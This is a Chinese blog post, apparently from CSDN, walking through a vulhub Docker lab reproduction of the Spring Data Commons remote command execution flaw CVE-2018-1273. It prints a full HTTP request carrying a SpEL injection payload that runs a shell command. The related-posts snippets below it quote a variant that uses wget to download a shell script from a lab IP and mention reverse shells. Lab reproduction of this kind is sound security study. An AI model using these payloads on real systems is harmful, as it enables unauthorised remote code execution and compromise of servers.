Spring Data Commons 远程命令执行漏洞(CVE-2018-1273)复现

已于 2022-05-25 19:30:43 修改
阅读量419 收藏
点赞数
文章标签: spring docker
于 2022-05-25 19:09:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/klcyl_0106/article/details/124971637
版权

1.通过"docker-compose build"和"docker-compose up -d"拉取环境

在这里插入图片描述刚开始直接敲命令docker-compose build出错,最后发现是未启动docker,所以通过systemctl start docker命令启动docker

2.访问服务器ip:8080/users看环境是否成功

在这里插入图片描述

3.注册时抓包,并修改成如下数据包:

POST /users?page=&size=5 HTTP/1.1
Host: localhost:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

在这里插入图片描述

4.查看是否成功

执行docker-compose exec spring bash进入容器中,可见成功创建/tmp/success,说明成功了
在这里插入图片描述

5.退出并关闭docker环境

exit,再输入sudo docker-compose down
在这里插入图片描述

kcllg
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
Spring Data Commons远程命令执行漏洞CVE-2018-1273)
wutiangui的博客
09-10 779
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
Spring-CVE_2018_1273
weixin_57567689的博客
10-29 589
Spring-CVE_2018_1273
spring:CVE-2018:1273
最新发布
weixin_69670995的博客
05-18 405
使用浏览器访问users,并输入随便东西。在kali上使用vim新建测试txt文件。使用dirsearch工具进行目录扫描。使用python3开启临时http。修改payload,让靶机执行木马。修改payload,提升木马权限。发到重发器,并修改post传参。返回200,上传txt文件成功。修改paylaod,上传木马。执行成功,返回靶机shell。使用burp抓包,点击注册。返回200,上传成功。
CVE-2018-1273漏洞
永远是少年
12-26 1331
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2018-1273漏洞。 一、CVE-2018-1273漏洞简介 二、CVE-2018-1273漏洞
[Vulfocus解题系列] 所漏洞总结
热门推荐
00勇士王子的博客
07-14 1万+
前言 写[Vulfocus解题系列]也有十天左右了,感觉虽然了一些漏洞,但是过后对这些漏洞的印象并不深刻,于是就有了写一篇总结篇的想法。把过的漏洞介绍、特征什么的总结过来,没事的时候看一看,加深一些印象,别之后别人闻起来某个漏洞,明明过,却忘了,那多不好意思。 已的Vulfocus靶场漏洞 Struts2-052远程代码执行CVE-2017-9805) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源
spring-data-commons-2.0.6.RELEASE-API文档-中文版.zip
07-14
赠送jar包:spring-data-commons-2.0.6.RELEASE.jar; 赠送原API文档:spring-data-commons-2.0.6.RELEASE-javadoc.jar; 赠送源代码:spring-data-commons-2.0.6.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
spring-data-commons-2.5.5-API文档-中文版.zip
06-04
赠送jar包:spring-data-commons-2.5.5.jar; 赠送原API文档:spring-data-commons-2.5.5-javadoc.jar; 赠送源代码:spring-data-commons-2.5.5-sources.jar; 赠送Maven依赖信息文件:spring-data-commons-2.5.5....
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
spring-data-commons-2.3.9.RELEASE-API文档-中文版.zip
07-13
赠送jar包:spring-data-commons-2.3.9.RELEASE.jar; 赠送原API文档:spring-data-commons-2.3.9.RELEASE-javadoc.jar; 赠送源代码:spring-data-commons-2.3.9.RELEASE-sources.jar; 赠送Maven依赖信息文件:...
【vulhub系列】cve-2018-1273S pring Expression Language 漏洞
Wiofgb的博客
08-12 296
记录一次cve-2018-1273S pring Expression Language漏洞
cve-2018-1273思路及简单利用(避坑)
weixin_45695535的博客
04-01 6851
过程环境准备攻击流程vulhub环境搭建构造poc利用-反弹shell-bash指令构造(失败)利用-反弹shell-从自己服务器下载.sh文件执行总结参考文档 环境准备 作者采用的是搭配是: 一台攻击机(kali-2021)192.168.141.190 受害机(vulhub搭建的)192.168.141.194 一台用来下载反弹shell脚本的服务器(内网,如果有服务器更好)192.168.141.128 攻击流程 vulhub环境搭建 找到cve-2018-1273文件夹,通过"docker-co
vulhub-CVE-2018-1273远程命令执行漏洞
m0_62008601的博客
09-23 1307
Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。看到靶机中已存在shll.elf文件。接着我们就需要开启监听,这时候用nc进行监听的话,收不到反弹的shell。发送命令之后返回500说明执行成功,接着我们登录到doker容器看到success文件成功被创建,说明漏洞存在。执行之后如果没成功反弹shell ,可以先执行赋予文件权限的命令。开启监听之后,再修改请求命令,让靶机执行木马文件上线。
Spring RCE漏洞分析2(CVE-2018-1273)
hldfight
05-07 1913
0x00 前言 继续分析Spring的历史漏洞,本篇记录Spring Data Commons的远程代码执行漏洞CVE-2018-1273)的分析。 0x01 环境搭建 使用的Spring Data Example Projects提供的示例代码。 但该项目中包含有15个子模块,如果将其整体导入IDEA,则需要下载所有模块中的依赖,显然这是没有必要的。通过参考这篇文章,发只需导入web模块中的...
vulfocusspring 命令执行 (CVE-2022-22947)
woai_zhongguo的博客
07-18 3841
vulfocusspring 命令执行 (CVE-2022-22947)
spring 代码执行CVE-2018-1273)
YouthBelief的博客
11-11 1708
spring 代码执行 CVE-2018-1273spring 代码执行CVE-2018-1273)0x01 漏洞描述0x02 影响范围0x03 漏洞wget反弹shell0x04 漏洞 spring 代码执行CVE-2018-1273) 0x01 漏洞描述 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 0x02 影
[Java安全]Spring Data CommonsCVE-2018-1273
snowlyzz的博客
02-08 658
CVE-2018-1273看漏洞分析
Spring Data Commons 远程命令执行漏洞CVE-2018-1273)——漏洞
weixin_42090431的博客
11-28 181
稍等一会,环境启动后,访问`http://your-ip:8080/users`,将可以看到一个用户注册页面。
描述**CVE**-2019-0232 Apache Tomcat远程代码执行漏洞
05-28
CVE-2019-0232是Apache Tomcat中的一个严重漏洞,可以允许攻击者通过特制的请求发送远程代码执行命令,从而控制Tomcat服务器。该漏洞由于存在于Tomcat中使用的Apache Commons FileUpload库中的一个漏洞,因此也被称为“Apache Commons FileUpload远程代码执行漏洞”。 攻击者可以构造一个特制的HTTP请求,该请求中包含恶意的JSP文件,并将该JSP文件传到Tomcat服务器上的一个目录中。一旦成功上传,攻击者可以通过直接访问该JSP文件来执行任意命令,包括获取服务器上的敏感数据或在服务器上执行其他恶意操作。 这个漏洞影响到Apache Tomcat 9.0.0.M1到9.0.17、8.5.0到8.5.39和7.0.0到7.0.93版本。Apache Tomcat官方已经发布了修这个漏洞的补丁程序,建议用户尽快升级到最新版本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值